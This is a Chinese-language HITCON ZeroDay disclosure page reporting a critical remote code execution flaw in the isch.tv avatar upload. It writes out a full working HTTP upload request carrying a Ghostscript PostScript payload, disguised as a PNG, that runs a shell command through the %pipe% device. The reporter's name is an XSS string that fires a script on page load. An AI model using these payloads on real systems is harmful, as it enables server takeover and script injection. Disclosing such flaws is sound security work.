愛電視 可上傳 Ghostscript 圖片導致 Remote Code Execution - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2018-01323
  •  發信 Vendor: 愛電視
  • Title: 愛電視 可上傳 Ghostscript 圖片導致 Remote Code Execution
  • Introduction: Remote Code Execution

處理狀態

目前狀態

公開
Last Update : 2018/11/11
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2018/09/11 02:42:46 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
  • 2018/09/11 02:45:40 : 新提交 (由 <svg/onload=alert(1)> 更新此狀態)
  • 2018/09/11 22:59:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/11 23:40:20 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/09/11 23:40:20 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2018/11/11 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2018-01323
  • 通報者:morrow (<svg/onload=alert(1)>)
  • 風險:嚴重
  • 類型:遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.isch.tv/member/index#

敘述

問題點發生在 https://www.isch.tv/member/index# 上傳大頭照的地方
透過上傳一個 postscript 格式的圖片,就能直接拿到網站的 shell

POST /member/upload-img HTTP/1.1
Host: www.isch.tv
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://www.isch.tv/member/index
X-Requested-With: XMLHttpRequest
Content-Length: 457
Content-Type: multipart/form-data; boundary=---------------------------1586078450505998939288925653
Cookie: 你的 cookie
Connection: close

-----------------------------1586078450505998939288925653
Content-Disposition: form-data; name="img"; filename="test.png"
Content-Type: image/png

%!PS-Adobe-1.0
%%BoundingBox:  100   100  100  100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%sleep 10) currentdevice putdeviceprops
-----------------------------1586078450505998939288925653--

圖片

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;